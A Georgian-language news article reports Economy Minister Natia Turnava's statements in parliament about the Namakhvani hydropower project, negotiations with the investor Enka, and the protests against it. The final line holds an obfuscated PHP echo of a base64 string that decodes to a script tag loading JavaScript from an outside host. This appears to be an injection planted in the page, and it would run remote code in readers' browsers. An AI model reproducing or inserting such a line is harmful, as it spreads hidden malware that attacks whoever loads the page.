celsiusi
ავერსი საქკაბელი
ეკონომიკის მინისტრის, ნათია თურნავას განცხადებით, დიდი იმედი აქვს, რომ “ნამახვანჰესი” აშენდება იმ შემთხვევაშიც, თუ პროექტიდან ამჟამინდელი ინვესტორი “ენკა” გავა. ამის შესახებ თურნავამ პარლამენტში ისაუბრა.
 
მისი განცხადებით, ამ ეტაპზე ხელისუფლებას “ენკასთან” მოლაპარაებები აქვს და “ენკას” განცხადება, რომ პროექტიდან სურს გასვლა, არ ნიშნავს არბიტრაჟის დაწყებას. თურნავას თქმით, ხელისუფლება დარწმუნებულია, რომ “ენკასთან” შეთანხმებას მიაღწევენ:
 
“არბიტრაჟი ნამდვილად არ არის დაწყებული, ჩვენ მათთან ვიმყოფებით მოლაპრაკების პროცესში, რომლის შედეგადაც თუ ვერ შევთანხმდით ჩვენ და ინვესტორი რაღაც პიროობებზე, რა პირობებითაც შეიძლება მათი დაბრუნება, თუნდაც მათი გასვლა პროექტიდან, იყოს ურთიერთშეთანხმებით და არ იყოს ისეთი პირობები, რომელიც, საბოლოო ჯამში, მერე ამ პროექტს დაუკარგავს საქართველოს.
 
ჩვენ დარწმუნებულები ვართ, რომ მივაღწევთ ამ შეთანხმებას და მაქსიმალურად ვცდილობთ, რომ არბიტრაჟის გარეშე გადავწყვიტოთ ეს საკითხი: ერთი, ინვესტორთან, და მეორე, იმდაგავრად მოგვარდეს, რომ ეს პროექტი შემდეგ კვლავ იყოს გახსნილი განხორციელებისთვის.
 
თუ ინვესტორი “ენკა” არ დარჩა პროექტში, შეიძლება თვითონ სახელმწიფომ განახორციელოს, რაც არ იქნება ურიგო იმ კითხვების გათვალისწინებით, რაც ამის ირგვლივ ჩნდება და ლიდერშიპი ჰქონდეს სახელმწიფოს… შეიძლება სრულად არ იყოს სახელმწიფო და სხვა ინვესტორიც იყოს მოყვანილი, მაგრამ, რაც მთავარია, ჩვენ ძალიან ბევრი რამ გვასწავლა ამ პრობლემამ, დაგვანახა ამ შემთხვევამ, რომ ამ მსხვილ პროექტებს სჭირდება განსხავვებული მდიგომა, მეტი მუშაობა მთავრობის მრიდან…
 
ძალიან დიდი იმედი გვაქვს, რომ ნამახვანი აშენდება, აშენდება სწორად და სახელმწიფოს ძალიან დიდი ჩართულობით”, – განაცხადა თურნავამ.
 
ამასთან, მისი თქმით, ნამახვანჰესის არსებობა საქარველოში უმნიშვნელოვანესია და ენერგეტიკული დამოუკიდებლობის ერთ-ერი ცენტრალური პროექტია. მისი განცხადებით, თავდაპირველად ინვესტორსა და მოსახლეობას შორის კარგი კომუნიკაცია იყო, თუმცა შემდეგ ეს კომუნიკაცია “შენელდა”, არა მხოლოდ სახელმწიფოს, არამედ ინვესტორის მხრიდანაც:
 
“ვფიქრობ, რომ კომუნიკაციის ნაკლებობა იყო არა მარტო სახელმწიფოს მხრიდან, არამედ ინვესტორს და მოსახლეობას შორის, არასამთავრობო სექტორთან, გარემოსდამცველებთან… ამან ბევრი პროლემა დაბადა, მათ შორის იყო ბევრი მითი, რომელიც ამ პროექტზე ვრცელდებოდა.
 
იყო გულწრფელი პროტესტიც. არ გამოვრიცხავ, რომ იყო გარკვეული მოტივირებული ჯგუფებიც, თუმცა, რა თქმა უნდა, ეს ცალკეული ეპიზოდები იყო და ძირითადად, ალბათ, გულწრფელი წუხილი და კითხვები იყო… საბოლოო ჯამში, გვაქვს ეს სურათი, რომ როდესაც ჩვენ დავიწყეთ ძალიან აქტიური კომუნიკაცია მათ შორის ინვესტორთანაც არსებული ჩარჩოს გასაუმჯობესებლად, გამოგვეკვეთა საკითხები, რომელზეც ყველაზე მეტი, თუნდაც ირაციონალური წუხილი იყო, მაგრამ შეიძლებოდა ამის გათვალისწინება იქიდან გამომდინარე, რომ პროექტი უფრო სწრაფად წასულიყო წინ”, – თქვა თურნავამ.
 
მისი განცხადებით, ინვესტორმაც “ვერ გამოიჩინა სათანადო მოთმინება და მოქნილობა”, მიუხედავად იმისა, რომ მსოფლიოში მსგავს პროექტებს გარემოსდამცველთა მხრიდან ხშირად მოჰყვება ხოლმე პროტესტი. მისი თქმით, თავდაპირველად “ენკას” ჰქონდა მზაობა, რა დროსაც გადაიდო კაშხლის მშენებლობა და კომპანია დამატებით კვლევებსაც დათანხმდა, თუმცა ეს პროცესი ბოლომდე ვერ მივიდა.
906
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");